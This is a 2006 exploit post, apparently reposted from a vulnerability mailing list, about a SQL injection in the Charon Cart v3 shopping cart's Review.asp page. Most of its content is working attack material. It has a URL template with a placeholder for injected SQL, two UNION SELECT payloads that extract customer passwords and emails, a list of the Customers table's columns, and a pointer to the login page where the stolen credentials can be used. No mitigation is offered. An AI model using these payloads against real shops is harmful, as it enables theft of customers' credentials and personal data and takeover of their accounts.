Security Advisory: Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  BizDirectory all version xss
  PhotoPost PHP 4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability
  Sql injection in Moodle
  MyBB 1.2 Full path and Cross site scripting vulnerabilities

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 19.09.2006
Subject: Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.charon.co.uk

# Exploit;

*******************************************************************************

###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]

Example:

//Review.asp?ProductID=-
1%20union%20select%20CustomerPassword%20from%20Customers%
20Where%20CustomerID%20=%201
//Review.asp?ProductID=-
1%20union%20select%20CustomerEmail%20from%20Customers%20W
here%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge]

Columns;
""""""""""""""
"""""""
CustomerID
""""""""""""""
"""""""
CustomerEmail
""""""""""""""
"""""""
CustomerPassword
""""""""""""""
"""""""
ShipCountry
""""""""""""""
"""""""
Phone
""""""""""""""
"""""""
.........
""""""""""""""
"""""""
....
""""""""""""""
"""""""
# ajann,Turkey
# ...
# Im not Hacker!